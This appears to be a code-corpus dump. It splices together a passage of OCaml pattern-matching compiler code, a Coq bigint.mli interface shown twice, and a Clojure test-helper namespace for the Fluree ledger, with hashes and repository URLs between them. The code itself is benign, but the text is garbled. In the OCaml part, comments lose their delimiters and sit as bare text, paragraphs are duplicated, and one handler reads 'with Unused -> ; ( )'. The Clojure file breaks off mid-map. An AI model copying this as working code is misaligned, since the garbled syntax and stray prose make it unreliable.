case (call to Matching.for_multiple_match from Translcore), but
didn't optimize situations where the rhs tuples are hidden under
a more complex context.
The idea comes from Alain Frisch who suggested and implemented
the following compilation method, based on Lassign:
let x = dummy in let y = dummy in
begin
let foo = ... in
if foo then
(let x1 = 1 in let y1 = 2 in x <- x1; y <- y1)
else
(let x2 = 3 in let y2 = 4 in x <- x2; y <- y2)
end;
bar
The current implementation from Gabriel Scherer uses Lstaticcatch /
Lstaticraise instead:
catch
let foo = ... in
if foo then
(let x1 = 1 in let y1 = 2 in exit x1 y1)
else
(let x2 = 3 in let y2 = 4 in exit x2 y2)
with x y ->
bar
The catch/exit is used to avoid duplication of the let body ('bar'
in the example), on 'if' branches for example; it is useless for
linear contexts such as 'let', but we don't need to be careful to
generate nice code because Simplif will remove such useless
catch/exit.
*)
let rec map_return f = function
| Llet (str, k, id, l1, l2) -> Llet (str, k, id, l1, map_return f l2)
| Lletrec (l1, l2) -> Lletrec (l1, map_return f l2)
| Lifthenelse (lcond, lthen, lelse) ->
Lifthenelse (lcond, map_return f lthen, map_return f lelse)
| Lsequence (l1, l2) -> Lsequence (l1, map_return f l2)
| Ltrywith (l1, id, l2) -> Ltrywith (map_return f l1, id, map_return f l2)
| Lstaticcatch (l1, b, l2) ->
Lstaticcatch (map_return f l1, b, map_return f l2)
| Lstaticraise _ | Lprim(Praise _, _, _) as l -> l
| l -> f l
The ' opt ' reference indicates if the optimization is worthy .
It is shared by the different calls to ' assign_pat ' performed from
' map_return ' . For example with the code
let ( x , y ) = if foo then z else ( 1,2 )
the else - branch will activate the optimization for both branches .
That means that the optimization is activated if * there exists * an
interesting tuple in one hole of the let - rhs context . We could
choose to activate it only if * all * holes are interesting . We made
that choice because being optimistic is extremely cheap ( one static
exit / catch overhead in the " wrong cases " ) , while being pessimistic
can be costly ( one unnecessary tuple allocation ) .
It is shared by the different calls to 'assign_pat' performed from
'map_return'. For example with the code
let (x, y) = if foo then z else (1,2)
the else-branch will activate the optimization for both branches.
That means that the optimization is activated if *there exists* an
interesting tuple in one hole of the let-rhs context. We could
choose to activate it only if *all* holes are interesting. We made
that choice because being optimistic is extremely cheap (one static
exit/catch overhead in the "wrong cases"), while being pessimistic
can be costly (one unnecessary tuple allocation).
*)
let assign_pat opt nraise catch_ids loc pat lam =
let rec collect acc pat lam = match pat.pat_desc, lam with
| Tpat_tuple patl, Lprim(Pmakeblock _, lams, _) ->
opt := true;
List.fold_left2 collect acc patl lams
| Tpat_tuple patl, Lconst(Const_block( _, scl)) ->
opt := true;
let collect_const acc pat sc = collect acc pat (Lconst sc) in
List.fold_left2 collect_const acc patl scl
| _ ->
pattern idents will be bound in ( let body ) , so we
refresh them here to guarantee binders uniqueness
refresh them here to guarantee binders uniqueness *)
let pat_ids = pat_bound_idents pat in
let fresh_ids = List.map (fun id -> id, Ident.rename id) pat_ids in
(fresh_ids, alpha_pat fresh_ids pat, lam) :: acc
in
let rev_sublets = List.rev (collect [] pat lam) in
let exit =
build an Ident.tbl to avoid quadratic refreshing costs
let add t (id, fresh_id) = Ident.add id fresh_id t in
let add_ids acc (ids, _pat, _lam) = List.fold_left add acc ids in
let tbl = List.fold_left add_ids Ident.empty rev_sublets in
let fresh_var id = Lvar (Ident.find_same id tbl) in
Lstaticraise(nraise, List.map fresh_var catch_ids)
in
let push_sublet code (_ids, pat, lam) = simple_for_let loc lam pat code in
List.fold_left push_sublet exit rev_sublets
let for_let loc param pat body =
match pat.pat_desc with
| Tpat_any ->
This eliminates a useless variable ( and stack slot in bytecode )
for " let _ = ... " . See # 6865 .
for "let _ = ...". See #6865. *)
Lsequence(param, body)
| Tpat_var (id, _) ->
Llet(Strict, Pgenval, id, param, body)
| _ ->
if !Config.bs_only then simple_for_let loc param pat body
else
let opt = ref false in
let nraise = next_raise_count () in
let catch_ids = pat_bound_idents pat in
let bind = map_return (assign_pat opt nraise catch_ids loc pat) param in
if !opt then Lstaticcatch(bind, (nraise, catch_ids), body)
else simple_for_let loc param pat body
let for_tupled_function loc paraml pats_act_list partial =
let partial = check_partial_list pats_act_list partial in
let raise_num = next_raise_count () in
let omegas = [List.map (fun _ -> omega) paraml] in
let pm =
{ cases = pats_act_list;
args = List.map (fun id -> (Lvar id, Strict)) paraml ;
default = [omegas,raise_num]
} in
try
let (lambda, total) = compile_match None partial
(start_ctx (List.length paraml)) pm in
check_total total lambda raise_num (partial_function loc)
with
| Unused -> partial_function loc ()
let flatten_pattern size p = match p.pat_desc with
| Tpat_tuple args -> args
| Tpat_any -> omegas size
| _ -> raise Cannot_flatten
let rec flatten_pat_line size p k = match p.pat_desc with
| Tpat_any -> omegas size::k
| Tpat_tuple args -> args::k
| Tpat_or (p1,p2,_) -> flatten_pat_line size p1 (flatten_pat_line size p2 k)
Note : if this ' as ' pat is here , then this is a
useless binding , solves
useless binding, solves PR#3780 *)
flatten_pat_line size p k
| _ -> fatal_error "Matching.flatten_pat_line"
let flatten_cases size cases =
List.map
(fun (ps,action) -> match ps with
| [p] -> flatten_pattern size p,action
| _ -> fatal_error "Matching.flatten_case")
cases
let flatten_matrix size pss =
List.fold_right
(fun ps r -> match ps with
| [p] -> flatten_pat_line size p r
| _ -> fatal_error "Matching.flatten_matrix")
pss []
let flatten_def size def =
List.map
(fun (pss,i) -> flatten_matrix size pss,i)
def
let flatten_pm size args pm =
{args = args ; cases = flatten_cases size pm.cases ;
default = flatten_def size pm.default}
let flatten_precompiled size args pmh = match pmh with
| Pm pm -> Pm (flatten_pm size args pm)
| PmOr {body=b ; handlers=hs ; or_matrix=m} ->
PmOr
{body=flatten_pm size args b ;
handlers=
List.map
(fun (mat,i,vars,pm) -> flatten_matrix size mat,i,vars,pm)
hs ;
or_matrix=flatten_matrix size m ;}
| PmVar _ -> assert false
is a ` ` comp_fun '' argument to comp_match_handlers .
Hence it needs a fourth argument , which it ignores
compiled_flattened is a ``comp_fun'' argument to comp_match_handlers.
Hence it needs a fourth argument, which it ignores
*)
let compile_flattened repr partial ctx _ pmh = match pmh with
| Pm pm -> compile_match repr partial ctx pm
| PmOr {body=b ; handlers=hs} ->
let lam, total = compile_match repr partial ctx b in
compile_orhandlers (compile_match repr partial) lam total ctx hs
| PmVar _ -> assert false
let do_for_multiple_match loc paraml pat_act_list partial =
let repr = None in
let partial = check_partial pat_act_list partial in
let raise_num,pm1 =
match partial with
| Partial ->
let raise_num = next_raise_count () in
raise_num,
{ cases = List.map (fun (pat, act) -> ([pat], act)) pat_act_list;
args = [Lprim(Pmakeblock( Blk_tuple), paraml, loc), Strict];
default = [[[omega]],raise_num] }
| _ ->
-1,
{ cases = List.map (fun (pat, act) -> ([pat], act)) pat_act_list;
args = [Lprim(Pmakeblock( Blk_tuple), paraml, loc), Strict];
default = [] } in
try
try
let next, nexts = split_precompile None pm1 in
let size = List.length paraml
and idl = List.map (fun _ -> Ident.create "match") paraml in
let args = List.map (fun id -> Lvar id, Alias) idl in
let flat_next = flatten_precompiled size args next
and flat_nexts =
List.map
(fun (e,pm) -> e,flatten_precompiled size args pm)
nexts in
let lam, total =
comp_match_handlers
(compile_flattened repr)
partial (start_ctx size) () flat_next flat_nexts in
List.fold_right2 (bind Strict) idl paraml
(match partial with
| Partial ->
check_total total lam raise_num (partial_function loc)
| Total ->
assert (jumps_is_empty total) ;
lam)
with Cannot_flatten ->
let (lambda, total) = compile_match None partial (start_ctx 1) pm1 in
begin match partial with
| Partial ->
check_total total lambda raise_num (partial_function loc)
| Total ->
assert (jumps_is_empty total) ;
lambda
end
with Unused ->
; ( )
let param_to_var param = match param with
| Lvar v -> v,None
| _ -> Ident.create "match",Some param
let bind_opt (v,eo) k = match eo with
| None -> k
| Some e -> Lambda.bind Strict v e k
let for_multiple_match loc paraml pat_act_list partial =
let v_paraml = List.map param_to_var paraml in
let paraml = List.map (fun (v,_) -> Lvar v) v_paraml in
List.fold_right bind_opt v_paraml
(do_for_multiple_match loc paraml pat_act_list partial)
|
540183582ffb3145dafe5b58e3df9ad3af0f7e39ecd8ee3638d5d32cfdf4fa73 | fetburner/Coq2SML | bigint.mli | (************************************************************************)
v * The Coq Proof Assistant / The Coq Development Team
< O _ _ _ , , * INRIA - CNRS - LIX - LRI - PPS - Copyright 1999 - 2014
\VV/ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
(* // * This file is distributed under the terms of the *)
(* * GNU Lesser General Public License Version 2.1 *)
(************************************************************************)
(** Arbitrary large integer numbers *)
type bigint
val of_string : string -> bigint
val to_string : bigint -> string
val of_int : int -> bigint
* May raise a Failure on oversized numbers
val zero : bigint
val one : bigint
val two : bigint
val div2_with_rest : bigint -> bigint * bool (** true=odd; false=even *)
val add_1 : bigint -> bigint
val sub_1 : bigint -> bigint
val mult_2 : bigint -> bigint
val add : bigint -> bigint -> bigint
val sub : bigint -> bigint -> bigint
val mult : bigint -> bigint -> bigint
val euclid : bigint -> bigint -> bigint * bigint
val less_than : bigint -> bigint -> bool
val equal : bigint -> bigint -> bool
val is_strictly_pos : bigint -> bool
val is_strictly_neg : bigint -> bool
val is_pos_or_zero : bigint -> bool
val is_neg_or_zero : bigint -> bool
val neg : bigint -> bigint
val pow : bigint -> int -> bigint
| null | https://raw.githubusercontent.com/fetburner/Coq2SML/322d613619edbb62edafa999bff24b1993f37612/coq-8.4pl4/lib/bigint.mli | ocaml | **********************************************************************
// * This file is distributed under the terms of the
* GNU Lesser General Public License Version 2.1
**********************************************************************
* Arbitrary large integer numbers
* true=odd; false=even | v * The Coq Proof Assistant / The Coq Development Team
< O _ _ _ , , * INRIA - CNRS - LIX - LRI - PPS - Copyright 1999 - 2014
\VV/ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
type bigint
val of_string : string -> bigint
val to_string : bigint -> string
val of_int : int -> bigint
* May raise a Failure on oversized numbers
val zero : bigint
val one : bigint
val two : bigint
val add_1 : bigint -> bigint
val sub_1 : bigint -> bigint
val mult_2 : bigint -> bigint
val add : bigint -> bigint -> bigint
val sub : bigint -> bigint -> bigint
val mult : bigint -> bigint -> bigint
val euclid : bigint -> bigint -> bigint * bigint
val less_than : bigint -> bigint -> bool
val equal : bigint -> bigint -> bool
val is_strictly_pos : bigint -> bool
val is_strictly_neg : bigint -> bool
val is_pos_or_zero : bigint -> bool
val is_neg_or_zero : bigint -> bool
val neg : bigint -> bigint
val pow : bigint -> int -> bigint
|
57f9b90206f747a03531b32e6b1eaffd587e8567dfb0de767bc2a611fc29f720 | fluree/ledger | test_helpers.clj | (ns fluree.db.test-helpers
(:require [clojure.test :refer :all]
[clojure.core.async :as async :refer [<!!]]
[fluree.db.server :as server]
[fluree.db.api :as fdb]
[fluree.db.server-settings :as setting]
[fluree.db.util.log :as log]
[clojure.java.io :as io]
[clojure.edn :as edn]
[fluree.db.util.json :as json]
[org.httpkit.client :as http]
[fluree.db.api.auth :as fdb-auth]
[fluree.db.ledger.txgroup.txgroup-proto :as txproto]
[clojure.string :as str])
(:import (java.net ServerSocket)
(java.util UUID)
(java.io File)))
(def ^:constant init-timeout-ms 120000)
(defn get-free-port []
(let [socket (ServerSocket. 0)]
(.close socket)
(.getLocalPort socket)))
(def port (delay (get-free-port)))
(def alt-port (delay (get-free-port)))
(def config (delay (setting/build-env
{:fdb-mode "dev"
:fdb-group-servers "DEF@localhost:11001"
:fdb-group-this-server "DEF"
:fdb-storage-type "memory"
:fdb-api-port @port
:fdb-consensus-type "in-memory"})))
(def system nil)
(def ledger-endpoints "fluree/api")
(def ledger-query+transact "fluree/querytransact")
(def ledger-chat "fluree/chat")
(def ledger-crypto "fluree/crypto")
(def ledger-voting "fluree/voting")
(def ledger-supplychain "fluree/supplychain")
(def ledger-todo "fluree/todo")
(def ledger-invoice "fluree/invoice")
(def ledger-mutable "fluree/mutable")
(def all-ledgers
#{ledger-endpoints ledger-query+transact ledger-chat ledger-crypto
ledger-voting ledger-supplychain ledger-todo ledger-invoice})
(defn print-banner [msg]
(println "\n*************************************\n\n"
msg
"\n\n*************************************"))
(defn start*
[& [opts]]
(alter-var-root #'system (constantly (server/startup (merge @config opts)))))
(defn start
[& [opts]]
(print-banner "STARTING")
(start* opts)
:started)
(defn stop* []
(alter-var-root #'system (fn [s] (when s (server/shutdown s)))))
(defn stop []
(print-banner "STOPPING")
(stop*)
:stopped)
(defn check-if-ready
"Kicks off simultaneous asynchronous ledger-ready? checks for every ledger in
ledgers. Returns a core.async channel that will be filled with vectors like
[ledger ready?] as they become available and then closed when all have been
returned."
[conn ledgers]
(let [res-ch (async/chan (count ledgers))
puts (atom 0)]
(dorun
(for [ledger ledgers]
(async/take! (fdb/ledger-ready?-async conn ledger)
#(async/put! res-ch [ledger %]
(fn [_]
(swap! puts inc)
(when (= @puts (count ledgers))
(async/close! res-ch)))))))
res-ch))
(defn wait-for-init
([conn ledgers] (wait-for-init conn ledgers init-timeout-ms))
([conn ledgers timeout]
(loop [sleep 0
elapsed 0
ledgers ledgers]
(let [start (System/currentTimeMillis)]
(Thread/sleep sleep)
(let [ready-checks (check-if-ready conn ledgers)
ready-ledgers (<!! (async/reduce
(fn [rls [ledger ready?]]
(assoc rls ledger ready?))
{} ready-checks))]
(when (not-every? second ready-ledgers)
(let [split (- (System/currentTimeMillis) start)
elapsed (+ elapsed split)]
(if (>= elapsed timeout)
(throw (RuntimeException.
(str "Waited " elapsed
"ms for test ledgers to initialize. Max is "
timeout "ms.")))
(let [poky-ledgers (remove second ready-ledgers)]
; seeing some intermittent failures to initialize sometimes
; so this starts outputting some diagnostic messages once
we 've used up 80 % of the timeout ; if we figure out what 's
; wrong, can remove the (when ...) form below and the (do ...)
; wrapper
(when (<= 80 (* 100 (/ elapsed timeout)))
(println "Running out of time for ledgers to init"
(str "(~" (- timeout elapsed) "ms remaining).")
"Waiting on" (count poky-ledgers)
"ledger(s) to initialize:"
(pr-str (map first poky-ledgers))))
(recur 1000 elapsed
(map first (remove second ready-ledgers))))))))))))
(defn init-ledgers!
"Creates ledgers and waits for them to be ready.
0-arity version creates fluree.db.test-helpers/all-ledgers.
1-and-2-arity versions take a collection of ledger names or maps that look
like: {:name \"ledger-name\", :opts opts-map-to-new-ledger}.
2-arity version takes an alternate system as the first arg (defaults to
fluree.db.test-helpers/system)."
([] (init-ledgers! system all-ledgers))
([ledgers] (init-ledgers! system ledgers))
([{:keys [conn] :as _system} ledgers]
(let [ledgers-with-opts (map #(if (map? %) % {:name %}) ledgers)
results (doall
(for [{ledger :name, opts :opts} ledgers-with-opts]
(fdb/new-ledger-async conn ledger opts)))]
;; check for any immediate errors (like invalid names) in create requests
(when-let [result (some #(when (instance? Exception %) %)
(map async/poll! results))]
(throw (ex-info (str "Error creating at least one test ledger: "
(ex-message result))
{:cause result})))
(wait-for-init conn (map :name ledgers-with-opts)))))
(defn standard-request
([body]
(standard-request body {}))
([body opts]
{:headers (cond-> {"content-type" "application/json"}
(:token opts) (assoc "Authorization" (str "Bearer " (:token opts))))
:body (json/stringify body)}))
(def endpoint-url-short (str ":" @port "/fdb/"))
(defn safe-update
"Like update but takes a predicate fn p that is first run on the current
value for key k in map m. Iff p returns truthy does the update take place."
[m k p f]
(let [v (get m k)]
(if (p v)
(update m k f)
m)))
(defn transact-resource
"Transacts the type (keyword form of test-resources subdirectory) of resource
with filename file. Optional api arg can be either :http (default) or :clj to
indicate which API to use for the transaction. :clj can be useful under
closed-api mode since this doesn't sign the HTTP requests."
([type ledger file] (transact-resource type ledger file :http))
([type ledger file api]
(let [filename (if (str/ends-with? file ".edn") file (str file ".edn"))
tx (->> filename (str (name type) "/") io/resource slurp edn/read-string)]
(case api
:clj
@(fdb/transact (:conn system) ledger tx)
:http
(let [endpoint (str endpoint-url-short ledger "/transact")]
(-> tx
standard-request
(->> (http/post endpoint))
deref
(safe-update :body string? json/parse)))))))
(def ^{:arglists '([ledger file] [ledger file api])
:doc "Like transact-resource but bakes in :schemas as the first arg."}
transact-schema
(partial transact-resource :schemas))
(def ^{:arglists '([ledger file] [ledger file api])
:doc "Like transact-resource but bakes in :data as the first arg."}
transact-data
(partial transact-resource :data))
(defn load-keys
[name]
(some-> name (str ".edn") (->> (str "keys/")) (->> io/resource) slurp
edn/read-string))
(defn rand-ledger
"Generate a random, new, empty ledger with base-name prefix. Waits for it to
be ready and then returns its name as a string.
Also takes an optional second map arg with the keys:
- :opts that will be passed to fluree.db.api/new-ledger-async
- :http/schema schema resource filenames that will be transacted with the HTTP API
- :clj/schema schema resource filenames that will be transacted with the CLJ API
- :http/data data resource filenames that will be transacted with the HTTP API
- :clj/data data resource filenames that will be transacted with the CLJ API"
([base-name] (rand-ledger base-name {}))
([base-name params]
(let [base-name* (if (str/includes? base-name "/")
base-name
(str "test/" base-name))
name (str base-name* "-" (UUID/randomUUID))]
(init-ledgers! [{:name name, :opts (:opts params)}])
(doseq [s (:clj/schema params)]
(transact-schema name s :clj))
(doseq [s (:http/schema params)]
(transact-schema name s :http))
(doseq [d (:clj/data params)]
(transact-data name d :clj))
(doseq [d (:http/data params)]
(transact-data name d :http))
name)))
(defn wait-for-system-ready
([timeout] (wait-for-system-ready system timeout))
([system timeout]
(print "Waiting for system to be ready ...") (flush)
(loop [sleep 0
elapsed 0]
(let [start (System/currentTimeMillis)]
(Thread/sleep sleep)
(print ".") (flush)
(let [{:keys [status]} (-> system :group txproto/-state)
consensus-type (get-in system [:config :consensus :type])]
(if (and
(or (= :in-memory consensus-type)
(and (= :raft consensus-type)
(= :leader status)))
;; Sometimes even when this node is the raft leader or using
;; in-memory consensus we still don't yet have a default private
key to sign unsigned with ; so wait for that too
(-> system :group txproto/get-shared-private-key))
(println " Ready!")
(let [split (- (System/currentTimeMillis) start)
elapsed (+ elapsed split)]
(when (>= elapsed timeout)
(throw (RuntimeException.
(str "Waited " elapsed
"ms for system to become ready. Max is "
timeout "ms."))))
(recur 1000 elapsed))))))))
(defn test-system
"This fixture is intended to be used like this:
(use-fixture :once test-system)
It starts up an in-memory (by default) ledger server for testing and waits
for it to be ready to use. It does not create any ledgers. You might find
the rand-ledger fn useful for that."
([tests] (test-system {} tests))
([opts tests]
(try
(start* opts)
(wait-for-system-ready init-timeout-ms)
(tests)
(catch Throwable e
(log/error e "Caught test exception")
(throw e))
(finally (stop*)))))
(defn create-auths
"Creates 3 auths in the given ledger: root, all persons, all persons no
handles. Returns of vector of [key-maps create-txn-result]."
([ledger] (create-auths ledger (:conn system)))
([ledger conn]
(let [keys (vec (repeatedly 3 fdb-auth/new-private-key))
add-auth [{:_id "_auth"
:id (get-in keys [0 :id])
:roles [["_role/id" "root"]]}
{:_id "_auth"
:id (get-in keys [1 :id])
:roles ["_role$allPersons"]}
{:_id "_auth"
:id (get-in keys [2 :id])
:roles ["_role$noHandles"]}
{:_id "_role$allPersons"
:id "allPersons"
:rules ["_rule$allPersons"]}
{:_id "_role$noHandles"
:id "noHandles"
:rules ["_rule$allPersons" "_rule$noHandles"]}
{:_id "_rule$allPersons"
:id "role$allPersons"
:collection "person"
:collectionDefault true
:fns [["_fn/name" "true"]]
:ops ["all"]}
{:_id "_rule$noHandles"
:id "noHandles"
:collection "person"
:predicates ["person/handle"]
:fns [["_fn/name" "false"]]
:ops ["all"]}]]
[keys (->> add-auth
(fdb/transact-async conn ledger)
<!!)])))
(defn create-temp-dir ^File
[]
(let [base-dir (io/file (System/getProperty "java.io.tmpdir"))
dir-path (io/file base-dir (str (System/currentTimeMillis) "-"
(long (rand 10000000000000))))]
(if (.mkdirs dir-path)
dir-path
(throw (ex-info "Failed to create temp directory"
{:dir-path dir-path})))))
(defn assert-success
[result]
(if (instance? Throwable result)
(throw result)
result))
(defn printlnn
[& s]
(apply println (concat s ["\n"])))
;; ======================== DEPRECATED ===============================
(defn ^:deprecated test-system-deprecated
"This fixture is deprecated. As tests are converted to the more idiomatic
approach, use the new test-system :once fixture w/ rand-ledger calls in each
test instead."
([f]
(test-system-deprecated {} f))
([opts f]
(try
(do (start opts)
(wait-for-system-ready init-timeout-ms)
(init-ledgers!)
(f))
:success
(catch Exception e
(log/error e "Caught test exception")
e)
(finally (stop)))))
(defn safe-Throwable->map [v]
(if (isa? (class v) Throwable)
(Throwable->map v)
(do
(println "Not a throwable:" (pr-str v))
v)))
(defn extract-errors [v]
(if (isa? (class v) Throwable)
(or (some-> (ex-data v) (assoc :message (ex-message v)))
(Throwable->map v))
(do
(println "Not a throwable:" (pr-str v))
v)))
(defn get-tempid-count
"Returns count of tempids within a collection, given the tempid map from the returned transaction
and a collection name."
[tempids collection]
(let [collection-tempids (get tempids collection)]
(when-not (sequential? collection-tempids)
(throw (ex-info (str "Unable to get collection range from tempid map for: " collection)
{:tempids tempids
:collection collection})))
(let [[start-sid end-sid] collection-tempids]
(inc (- end-sid start-sid)))))
(defn contains-every?
"Returns true if and only if map m contains every key supplied in subsequent
args ks. Uses (contains? m k) so the same semantics apply (e.g. checks for
map keys not values).
NB: This is NOT the same as set equality. It checks that the set contents of
m is a (non-strict) superset of ks. In other words, m can have more than ks,
but must have all of ks."
[m & ks]
(every? #(contains? m %) ks))
| null | https://raw.githubusercontent.com/fluree/ledger/af93dd2f0261cabed58fadedbe215e828d38cb44/test/fluree/db/test_helpers.clj | clojure | seeing some intermittent failures to initialize sometimes
so this starts outputting some diagnostic messages once
if we figure out what 's
wrong, can remove the (when ...) form below and the (do ...)
wrapper
check for any immediate errors (like invalid names) in create requests
Sometimes even when this node is the raft leader or using
in-memory consensus we still don't yet have a default private
so wait for that too
======================== DEPRECATED =============================== | (ns fluree.db.test-helpers
(:require [clojure.test :refer :all]
[clojure.core.async :as async :refer [<!!]]
[fluree.db.server :as server]
[fluree.db.api :as fdb]
[fluree.db.server-settings :as setting]
[fluree.db.util.log :as log]
[clojure.java.io :as io]
[clojure.edn :as edn]
[fluree.db.util.json :as json]
[org.httpkit.client :as http]
[fluree.db.api.auth :as fdb-auth]
[fluree.db.ledger.txgroup.txgroup-proto :as txproto]
[clojure.string :as str])
(:import (java.net ServerSocket)
(java.util UUID)
(java.io File)))
(def ^:constant init-timeout-ms 120000)
(defn get-free-port []
(let [socket (ServerSocket. 0)]
(.close socket)
(.getLocalPort socket)))
(def port (delay (get-free-port)))
(def alt-port (delay (get-free-port)))
(def config (delay (setting/build-env
{:fdb-mode "dev"
:fdb-group-servers "DEF@localhost:11001"
:fdb-group-this-server "DEF"
:fdb-storage-type "memory"
:fdb-api-port @port
:fdb-consensus-type "in-memory"})))
(def system nil)
(def ledger-endpoints "fluree/api")
(def ledger-query+transact "fluree/querytransact")
(def ledger-chat "fluree/chat")
(def ledger-crypto "fluree/crypto")
(def ledger-voting "fluree/voting")
(def ledger-supplychain "fluree/supplychain")
(def ledger-todo "fluree/todo")
(def ledger-invoice "fluree/invoice")
(def ledger-mutable "fluree/mutable")
(def all-ledgers
#{ledger-endpoints ledger-query+transact ledger-chat ledger-crypto
ledger-voting ledger-supplychain ledger-todo ledger-invoice})
(defn print-banner [msg]
(println "\n*************************************\n\n"
msg
"\n\n*************************************"))
(defn start*
[& [opts]]
(alter-var-root #'system (constantly (server/startup (merge @config opts)))))
(defn start
[& [opts]]
(print-banner "STARTING")
(start* opts)
:started)
(defn stop* []
(alter-var-root #'system (fn [s] (when s (server/shutdown s)))))
(defn stop []
(print-banner "STOPPING")
(stop*)
:stopped)
(defn check-if-ready
"Kicks off simultaneous asynchronous ledger-ready? checks for every ledger in
ledgers. Returns a core.async channel that will be filled with vectors like
[ledger ready?] as they become available and then closed when all have been
returned."
[conn ledgers]
(let [res-ch (async/chan (count ledgers))
puts (atom 0)]
(dorun
(for [ledger ledgers]
(async/take! (fdb/ledger-ready?-async conn ledger)
#(async/put! res-ch [ledger %]
(fn [_]
(swap! puts inc)
(when (= @puts (count ledgers))
(async/close! res-ch)))))))
res-ch))
(defn wait-for-init
([conn ledgers] (wait-for-init conn ledgers init-timeout-ms))
([conn ledgers timeout]
(loop [sleep 0
elapsed 0
ledgers ledgers]
(let [start (System/currentTimeMillis)]
(Thread/sleep sleep)
(let [ready-checks (check-if-ready conn ledgers)
ready-ledgers (<!! (async/reduce
(fn [rls [ledger ready?]]
(assoc rls ledger ready?))
{} ready-checks))]
(when (not-every? second ready-ledgers)
(let [split (- (System/currentTimeMillis) start)
elapsed (+ elapsed split)]
(if (>= elapsed timeout)
(throw (RuntimeException.
(str "Waited " elapsed
"ms for test ledgers to initialize. Max is "
timeout "ms.")))
(let [poky-ledgers (remove second ready-ledgers)]
(when (<= 80 (* 100 (/ elapsed timeout)))
(println "Running out of time for ledgers to init"
(str "(~" (- timeout elapsed) "ms remaining).")
"Waiting on" (count poky-ledgers)
"ledger(s) to initialize:"
(pr-str (map first poky-ledgers))))
(recur 1000 elapsed
(map first (remove second ready-ledgers))))))))))))
(defn init-ledgers!
"Creates ledgers and waits for them to be ready.
0-arity version creates fluree.db.test-helpers/all-ledgers.
1-and-2-arity versions take a collection of ledger names or maps that look
like: {:name \"ledger-name\", :opts opts-map-to-new-ledger}.
2-arity version takes an alternate system as the first arg (defaults to
fluree.db.test-helpers/system)."
([] (init-ledgers! system all-ledgers))
([ledgers] (init-ledgers! system ledgers))
([{:keys [conn] :as _system} ledgers]
(let [ledgers-with-opts (map #(if (map? %) % {:name %}) ledgers)
results (doall
(for [{ledger :name, opts :opts} ledgers-with-opts]
(fdb/new-ledger-async conn ledger opts)))]
(when-let [result (some #(when (instance? Exception %) %)
(map async/poll! results))]
(throw (ex-info (str "Error creating at least one test ledger: "
(ex-message result))
{:cause result})))
(wait-for-init conn (map :name ledgers-with-opts)))))
(defn standard-request
([body]
(standard-request body {}))
([body opts]
{:headers (cond-> {"content-type" "application/json"}
(:token opts) (assoc "Authorization" (str "Bearer " (:token opts))))
:body (json/stringify body)}))
(def endpoint-url-short (str ":" @port "/fdb/"))
(defn safe-update
"Like update but takes a predicate fn p that is first run on the current
value for key k in map m. Iff p returns truthy does the update take place."
[m k p f]
(let [v (get m k)]
(if (p v)
(update m k f)
m)))
(defn transact-resource
"Transacts the type (keyword form of test-resources subdirectory) of resource
with filename file. Optional api arg can be either :http (default) or :clj to
indicate which API to use for the transaction. :clj can be useful under
closed-api mode since this doesn't sign the HTTP requests."
([type ledger file] (transact-resource type ledger file :http))
([type ledger file api]
(let [filename (if (str/ends-with? file ".edn") file (str file ".edn"))
tx (->> filename (str (name type) "/") io/resource slurp edn/read-string)]
(case api
:clj
@(fdb/transact (:conn system) ledger tx)
:http
(let [endpoint (str endpoint-url-short ledger "/transact")]
(-> tx
standard-request
(->> (http/post endpoint))
deref
(safe-update :body string? json/parse)))))))
(def ^{:arglists '([ledger file] [ledger file api])
:doc "Like transact-resource but bakes in :schemas as the first arg."}
transact-schema
(partial transact-resource :schemas))
(def ^{:arglists '([ledger file] [ledger file api])
:doc "Like transact-resource but bakes in :data as the first arg."}
transact-data
(partial transact-resource :data))
(defn load-keys
[name]
(some-> name (str ".edn") (->> (str "keys/")) (->> io/resource) slurp
edn/read-string))
(defn rand-ledger
"Generate a random, new, empty ledger with base-name prefix. Waits for it to
be ready and then returns its name as a string.
Also takes an optional second map arg with the keys:
- :opts that will be passed to fluree.db.api/new-ledger-async
- :http/schema schema resource filenames that will be transacted with the HTTP API
- :clj/schema schema resource filenames that will be transacted with the CLJ API
- :http/data data resource filenames that will be transacted with the HTTP API
- :clj/data data resource filenames that will be transacted with the CLJ API"
([base-name] (rand-ledger base-name {}))
([base-name params]
(let [base-name* (if (str/includes? base-name "/")
base-name
(str "test/" base-name))
name (str base-name* "-" (UUID/randomUUID))]
(init-ledgers! [{:name name, :opts (:opts params)}])
(doseq [s (:clj/schema params)]
(transact-schema name s :clj))
(doseq [s (:http/schema params)]
(transact-schema name s :http))
(doseq [d (:clj/data params)]
(transact-data name d :clj))
(doseq [d (:http/data params)]
(transact-data name d :http))
name)))
(defn wait-for-system-ready
([timeout] (wait-for-system-ready system timeout))
([system timeout]
(print "Waiting for system to be ready ...") (flush)
(loop [sleep 0
elapsed 0]
(let [start (System/currentTimeMillis)]
(Thread/sleep sleep)
(print ".") (flush)
(let [{:keys [status]} (-> system :group txproto/-state)
consensus-type (get-in system [:config :consensus :type])]
(if (and
(or (= :in-memory consensus-type)
(and (= :raft consensus-type)
(= :leader status)))
(-> system :group txproto/get-shared-private-key))
(println " Ready!")
(let [split (- (System/currentTimeMillis) start)
elapsed (+ elapsed split)]
(when (>= elapsed timeout)
(throw (RuntimeException.
(str "Waited " elapsed
"ms for system to become ready. Max is "
timeout "ms."))))
(recur 1000 elapsed))))))))
(defn test-system
"This fixture is intended to be used like this:
(use-fixture :once test-system)
It starts up an in-memory (by default) ledger server for testing and waits
for it to be ready to use. It does not create any ledgers. You might find
the rand-ledger fn useful for that."
([tests] (test-system {} tests))
([opts tests]
(try
(start* opts)
(wait-for-system-ready init-timeout-ms)
(tests)
(catch Throwable e
(log/error e "Caught test exception")
(throw e))
(finally (stop*)))))
(defn create-auths
"Creates 3 auths in the given ledger: root, all persons, all persons no
handles. Returns of vector of [key-maps create-txn-result]."
([ledger] (create-auths ledger (:conn system)))
([ledger conn]
(let [keys (vec (repeatedly 3 fdb-auth/new-private-key))
add-auth [{:_id "_auth"
:id (get-in keys [0 :id])
:roles [["_role/id" "root"]]}
{:_id "_auth"
:id (get-in keys [1 :id])
:roles ["_role$allPersons"]}
{:_id "_auth"
:id (get-in keys [2 :id])
:roles ["_role$noHandles"]}
{:_id "_role$allPersons"
:id "allPersons"
:rules ["_rule$allPersons"]}
{:_id "_role$noHandles"
:id "noHandles"
:rules ["_rule$allPersons" "_rule$noHandles"]}
{:_id "_rule$allPersons"
:id "role$allPersons"
:collection "person"
